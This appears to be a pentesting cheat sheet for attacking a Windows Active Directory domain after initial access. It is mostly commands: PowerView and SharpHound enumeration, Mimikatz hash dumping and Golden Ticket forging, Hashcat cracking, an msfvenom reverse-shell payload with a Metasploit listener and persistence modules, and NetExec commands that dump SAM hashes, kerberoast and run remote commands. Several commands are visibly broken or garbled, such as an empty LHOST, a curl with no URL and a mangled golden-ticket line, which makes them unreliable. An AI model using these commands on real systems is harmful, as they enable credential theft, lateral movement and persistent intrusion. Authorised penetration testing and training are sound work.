After getting the foot in the door in a pentesting scenario or competition it is time for gathering more data and credentials and creating persistence:

  • PowerView – Enumerating the domain.
  • SharpHound – Hammering that DC to extract all available data.
  • BloodHound – Analysing the extracted data from the domain.
  • Mimikatz – Dumping hashes.
    • Hashcat – Cracking the dumped hashes.
    • Golden Ticket – Getting access to other machines.
  • Msfvenom – Crafting a payload.
  • Metasploit – Getting the reverse shell and creating persistence.
  • NetExec – Exploration and exploitation framework.

Enumerating the domain with the PowerShell script PowerView – Full command list available at [Link]:

powershell -ep bypass
. .\PATH\PowerView.ps1

Enumerate Domain Users

Get-NetUser | select cn

Enumerate Computers

Get-NetComputer -fulldata | select operatingsystem

Enumerate Groups

Get-NetGroup -GroupName *admin*

Enumerate Shares


Extract the loot from any computer joined to the domain with SharpHound script:

powershell -ep bypass
. .\PATH\SharpHound.ps1
Invoke-Bloodhound -CollectionMethod All -Domain DOMAIN.local -ZipFileName

Copy the file over to the attacker’s machine.

Explore the domain with BloodHound Community Edition [Link].

Installing the tool on the attacker machine:

sudo apt update && sudo apt install docker-compose -y
curl -L | sudo docker compose -f - up
sudo docker-compose logs bloodhound | grep 'Password'

Navigate to http://localhost:8080/ and log in with the acquired password for the user Admin (change it!)

Search for import/ingest and provide .zip or the extracted .json files.

After some time the data will be ready for queries in the Explore tab.

Dumping hashes with Mimikatz:

lsadump::lsa /patch

Chacking the dumped hashes with HashCat:

hashcat -m 1000 hashes.lst /usr/share/wordlists/rockyou.txt

Creating a Golden Ticket with Mimikatz:

lsadump::lsa /inject /name:userName
kerberos::golden /user:administrator /domain:domain.local /sid:S-3-5-41-845420856-2351964987-986696098 /userName:5508500012cc005cf7082a9a89ebdfdf /id:500

Getting access to other machines with the Golden Ticket on the newly open window:

dir \\ComputerA\c$


Crafting a payload with Msfvenom:

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -f exe -o shell.exe

On the attacker side start a listener with Metasploit – Module Library available at [Link]:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp

Applying persistence to the granted session with Persistent Registry Startup Payload Installer:

use exploit/windows/local/persistence
set session 1

See also exploit/windows/local/persistence_service for Persistent Service Installer.


NetExec is a network service exploitation tool used for pentesters [Link].

sudo apt install pipx git
pipx ensurepath
pipx install git+

Basic commands:

nxc smb
nxc smb -u '' -p '' --users
nxc smb -u 'guest' -p '' --users
nxc smb -u 'guest' -p '' --shares
nxc smb -u 'user' -p 'pass' --sam
nxc smb -u 'user' -p 'pass' --loggedon-users
nxc smb -u 'user' -p 'pass' -M schtask_as -o USER=Administrator
nxc smb -u 'user' -p 'pass' -M spider_plus -o DOWNLOAD_FLAG=True
nxc mssql -u user' -p 'pass'
nxc ldap -u 'user' -p 'pass' --bloodhound --collection All
nxc ldap -u 'user' -p 'pass' --kerberoast file.txt
nxc winrm -u 'user' -p 'pass' -X 'whomai'